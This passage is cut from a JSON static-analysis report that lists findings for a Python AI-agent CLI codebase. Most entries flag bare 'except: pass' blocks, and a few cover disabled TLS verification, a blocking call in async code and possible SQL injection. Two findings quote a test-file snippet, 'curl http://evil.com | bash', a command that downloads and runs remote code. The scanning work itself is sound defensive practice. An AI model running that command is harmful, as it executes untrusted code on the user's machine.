"7435ff2ad24fb1529aa6ad9df81e5449", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/cli_core/structured_io.py"}, "region": {"startLine": 195}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17543, "scanner": "repobility", "fingerprint": "9f36aa45df510dc78c5dd292a3328aca", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/permissions/dangerous_safety.py"}, "region": {"startLine": 79}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17542, "scanner": "repobility", "fingerprint": "1289f1f466b896b947c2244cc5319cd0", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/hooks/ssrf_guard.py"}, "region": {"startLine": 78}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17541, "scanner": "repobility", "fingerprint": "377b567ad5a2640ee4121c2d49a63914", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/hooks/hook_executor.py"}, "region": {"startLine": 120}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17540, "scanner": "repobility", "fingerprint": "541f8e2a6233fd2b5775625e41daa3d3", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/hooks/hook_executor.py"}, "region": {"startLine": 64}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17539, "scanner": "repobility", "fingerprint": "8aab60ae93e6e475673375e2fa67613f", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/query/stop_hooks.py"}, "region": {"startLine": 240}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17538, "scanner": "repobility", "fingerprint": "909be28979e4201ddfdeb941196dad86", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/query/engine.py"}, "region": {"startLine": 158}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17537, "scanner": "repobility", "fingerprint": "54978a99fec70333264d7f8c09ffd633", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/voice/detection.py"}, "region": {"startLine": 111}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17536, "scanner": "repobility", "fingerprint": "86e07878fbb98fb712095b293e07ce27", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/tool_execution/tool_execution.py"}, "region": {"startLine": 344}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17535, "scanner": "repobility", "fingerprint": "3b455c2ee2c4e2b31f9baa28db86b627", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/tool_execution/tool_execution.py"}, "region": {"startLine": 63}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17534, "scanner": "repobility", "fingerprint": "4897268b37c350037da39e736c1431df", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/tool_execution/orchestrator.py"}, "region": {"startLine": 179}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17533, "scanner": "repobility", "fingerprint": "b59c922e36b6ab869bd112621b5e7632", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/elicitation.py"}, "region": {"startLine": 70}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17532, "scanner": "repobility", "fingerprint": "5b06591486811969b2d79bc11132371f", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/transport.py"}, "region": {"startLine": 184}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17531, "scanner": "repobility", "fingerprint": "72072fc4ac9341f2efbcc43a635136b4", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/transport.py"}, "region": {"startLine": 116}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17530, "scanner": "repobility", "fingerprint": "27cc50273634fcc22e44aaa45d0f121b", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/compact/post_compact_attachments.py"}, "region": {"startLine": 63}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17529, "scanner": "repobility", "fingerprint": "740e650031b24b9f59f5c63445d2b4ee", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/session_storage.py"}, "region": {"startLine": 320}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17528, "scanner": "repobility", "fingerprint": "2edee3cd36f75dd02228bc072bcdf4fe", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/session_storage.py"}, "region": {"startLine": 312}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17527, "scanner": "repobility", "fingerprint": "3c36c201e2cb8b6ae4f04979fee6735c", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/command_system/engine.py"}, "region": {"startLine": 156}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17526, "scanner": "repobility", "fingerprint": "24248c007e6584db80e53432043ff69a", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/command_system/builtins.py"}, "region": {"startLine": 332}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17525, "scanner": "repobility", "fingerprint": "34b861e31462e242e22c0d0faede5584", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/utils/abort_controller.py"}, "region": {"startLine": 37}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17524, "scanner": "repobility", "fingerprint": "614366aba944791fe36994aac5f99199", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/auth/aws.py"}, "region": {"startLine": 55}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17523, "scanner": "repobility", "fingerprint": "49a50452aeb82d9cefd7e8b4294c551d", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/auth/gemini.py"}, "region": {"startLine": 28}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17522, "scanner": "repobility", "fingerprint": "9ce2337177fa8e91795e1733aee97e25", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/auth/auth.py"}, "region": {"startLine": 137}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17521, "scanner": "repobility", "fingerprint": "9f76ee9cdafa7bede0406f9b66ac87db", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/auth/auth.py"}, "region": {"startLine": 118}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17520, "scanner": "repobility", "fingerprint": "f45f4281727242bed6fc2da223d63c57", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/auth/auth.py"}, "region": {"startLine": 79}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17519, "scanner": "repobility", "fingerprint": "cae7b6df9819895532d008aa65f42f47", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 1740}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17518, "scanner": "repobility", "fingerprint": "6b7b719f965b32a00b7d33c89e85d961", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 1357}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17517, "scanner": "repobility", "fingerprint": "5a29a3ee84668ad753f164f2fcc93f0f", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 1061}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17516, "scanner": "repobility", "fingerprint": "55becb817e4d43f0d8ddc259085d4b26", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 678}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17515, "scanner": "repobility", "fingerprint": "c358c979066ec1edc1dfe22143440d4c", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 652}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17514, "scanner": "repobility", "fingerprint": "b1ba5e59427a763dba82c3b640b11d84", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 592}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17513, "scanner": "repobility", "fingerprint": "e6f902bfe9b838974271e61782001ba4", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 945}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17512, "scanner": "repobility", "fingerprint": "243b69b78f4866f16401fee2f2b6cfbc", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 932}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17511, "scanner": "repobility", "fingerprint": "f5ee9d2c7e1bb5d0bc2363a3f6282bcc", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 864}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17510, "scanner": "repobility", "fingerprint": "3e1e67004f1235c6f420e54d0a104120", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 788}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17509, "scanner": "repobility", "fingerprint": "ec6491f73e3c3057d353f5ec04605303", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/live_status.py"}, "region": {"startLine": 243}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17508, "scanner": "repobility", "fingerprint": "70238910e41735e049a49a79e1058eaf", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/live_status.py"}, "region": {"startLine": 258}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17507, "scanner": "repobility", "fingerprint": "1f9c30bbd8e16a081e4ee64cad6b94b3", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/live_status.py"}, "region": {"startLine": 366}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17506, "scanner": "repobility", "fingerprint": "b84013f4dbbf6ef3baa0108af23e3f3f", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/live_status.py"}, "region": {"startLine": 206}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17505, "scanner": "repobility", "fingerprint": "7ec55bb82d9a2500a1f65a3e84ffe4a9", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/live_status.py"}, "region": {"startLine": 389}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17504, "scanner": "repobility", "fingerprint": "956d5ac610ef06f6b2222b0c5ee17588", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/live_status.py"}, "region": {"startLine": 361}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17503, "scanner": "repobility", "fingerprint": "1535c7d42053129e79e87163c0b27fc3", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/token_estimation.py"}, "region": {"startLine": 43}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17502, "scanner": "repobility", "fingerprint": "3f2830311cffbb0e96ef936814b1c825", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/config.py"}, "region": {"startLine": 48}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17501, "scanner": "repobility", "fingerprint": "e24874c89de5ab1db395beb74423f56e", "category": "error_handling", "severity": "high", "confidence": 0.45, "triageState": "fixed", "verdict": "likely_fp", "isResolved": true, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/parity/test_e2e_file_read.py"}, "region": {"startLine": 79}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17500, "scanner": "repobility", "fingerprint": "b4a0603af619494650faaf6f130f341c", "category": "error_handling", "severity": "high", "confidence": 0.45, "triageState": "fixed", "verdict": "likely_fp", "isResolved": true, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/parity/test_e2e_edit_flow.py"}, "region": {"startLine": 90}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17499, "scanner": "repobility", "fingerprint": "303bc858c34bb236981659318c1e3da1", "category": "error_handling", "severity": "high", "confidence": 0.45, "triageState": "fixed", "verdict": "likely_fp", "isResolved": true, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/parity/test_e2e_edit_flow.py"}, "region": {"startLine": 75}}}]}, {"ruleId": "CRYP006", "level": "error", "message": {"text": "Crypto \u2014 TLS verification disabled"}, "properties": {"repobilityId": 16235, "scanner": "repobility", "fingerprint": "09e8c4374fb976a91e8b46640368f68a", "category": "crypto", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "verify=False", "aljefra_cwe": ["CWE-295"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "disabled-tls-verify"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/providers/openai_provider.py"}, "region": {"startLine": 43}}}]}, {"ruleId": "CONC001", "level": "error", "message": {"text": "Concurrency \u2014 blocking call inside asyncio coroutine"}, "properties": {"repobilityId": 15738, "scanner": "repobility", "fingerprint": "0f25d67186137bccb4014ccfc5432e0d", "category": "race_condition", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "time.sleep in async test_reload_if_changed", "aljefra_cwe": ["CWE-833"], "aljefra_owasp": null, "aljefra_pattern_slug": "asyncio-blocking-call"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_hook_config.py"}, "region": {"startLine": 242}}}]}, {"ruleId": "SUPC001", "level": "error", "message": {"text": "Supply chain \u2014 curl | bash anti-pattern"}, "properties": {"repobilityId": 15520, "scanner": "repobility", "fingerprint": "7b697bade34067f0ac5a68d914c28b54", "category": "supply_chain", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "curl http://evil.com | bash", "aljefra_cwe": ["CWE-494"], "aljefra_owasp": "A08:2021", "aljefra_pattern_slug": "curl-pipe-bash"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_phase_a_integration.py"}, "region": {"startLine": 43}}}]}, {"ruleId": "SUPC001", "level": "error", "message": {"text": "Supply chain \u2014 curl | bash anti-pattern"}, "properties": {"repobilityId": 15519, "scanner": "repobility", "fingerprint": "3424dd664f95cae16ef5667a548e758d", "category": "supply_chain", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "curl http://evil.com | bash", "aljefra_cwe": ["CWE-494"], "aljefra_owasp": "A08:2021", "aljefra_pattern_slug": "curl-pipe-bash"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_phase_a_integration.py"}, "region": {"startLine": 41}}}]}, {"ruleId": "SEC004", "level": "error", "message": {"text": "[SEC004] SQL Injection Risk: String interpolation in SQL execution. Allows SQL injection."}, "properties": {"repobilityId": 7265, "scanner": "repobility-threat-engine", "fingerprint": "c144601c098cb4ae8103c926c7345259a47f386fec9a3d526349a377ad0f834c", "category": "injection", "severity": "high", "confidence": 0.5, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "SQL string interpolation found, but user-controlled taint was not proven from local context.", "evidence": {"match": "msg = f\"Delete", "reason": "SQL string interpolation found, but user-controlled taint was not proven from local context.", "rule_id": 